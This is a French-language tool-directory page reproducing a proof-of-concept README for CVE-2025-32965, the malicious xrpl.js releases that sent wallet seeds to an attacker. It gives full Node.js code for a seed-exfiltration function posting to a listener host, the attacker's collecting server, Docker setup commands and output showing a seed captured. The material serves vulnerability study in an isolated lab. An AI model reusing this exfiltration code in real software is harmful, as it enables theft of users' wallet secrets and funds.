Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32965-xrpl-js-poc — Code CVE: CVE-2025-32965 Type de vulnérabilité: Attaque par chaîne d'approvisionnement (CWE-506: Code malveillant intégré) Cible: versions 4.2.1–4.2.4 et 2.14.2 de la bibliothèque xrpl.js Impact: envoi des données seed/secret du portefeuille de l'utilisateur à l'attaquant | Kitploit
Outils/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
Analyse des VulnérabilitésExploitationExfiltration de DonnéesAnalyse de MalwareSécurité de la Chaîne LogistiqueApprentissage et Éducation
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

Code CVE: CVE-2025-32965 Type de vulnérabilité: Attaque par chaîne d'approvisionnement (CWE-506: Code malveillant intégré) Cible: versions 4.2.1–4.2.4 et 2.14.2 de la bibliothèque xrpl.js Impact: envoi des données seed/secret du portefeuille de l'utilisateur à l'attaquant

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32965 — Rapport PoC d'attaque sur la chaîne d'approvisionnement xrpl.js

Description de la vulnérabilité

  • CVE Kodu: CVE-2025-32965
  • Type de vulnérabilité: Supply Chain Attack (CWE-506: Code malveillant intégré)
  • Cible: versions 4.2.1–4.2.4 et 2.14.2 de la bibliothèque xrpl.js
  • Impact: Envoi des données seed/secret du portefeuille de l'utilisateur à l'attaquant

Objectif

Ce PoC vise à montrer dans un environnement isolé comment une version malveillante de xrpl.js peut effectuer une exfiltration de seed.

Structure de l'environnement

  • Plateforme: Docker (Ubuntu basé sur WSL)
  • Réseau: réseau Docker privé nommé xrplnet
  • Conteneurs:
    • poc-listener: serveur attaquant collectant les données de seed
    • xrpl-poc: conteneur PoC hébergeant les scripts de test côté victime

Fichiers utilisés

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})

Étapes

  1. Docker Build:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. Démarrer le Listener:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. Envoi du seed par la victime:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

Exemple de sortie

Terminal de la victime:

root@kitploit:~
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Terminal de l'attaquant:

root@kitploit:~
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Conclusion

Ce PoC a montré comment la vulnérabilité CVE-2025-32965 peut être exploitée en pratique. Le code d'exfiltration de seed de la bibliothèque xrpl.js malveillante a été exécuté avec succès dans un environnement de test isolé et des données ont été exfiltrées vers le serveur de l'attaquant.

Structure du dépôt GitHub (suggérée)

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

Préparé par: Yusuf Dalbudak Environnement de test: WSL2 + Docker + Node.js v20

Télécharger l’outil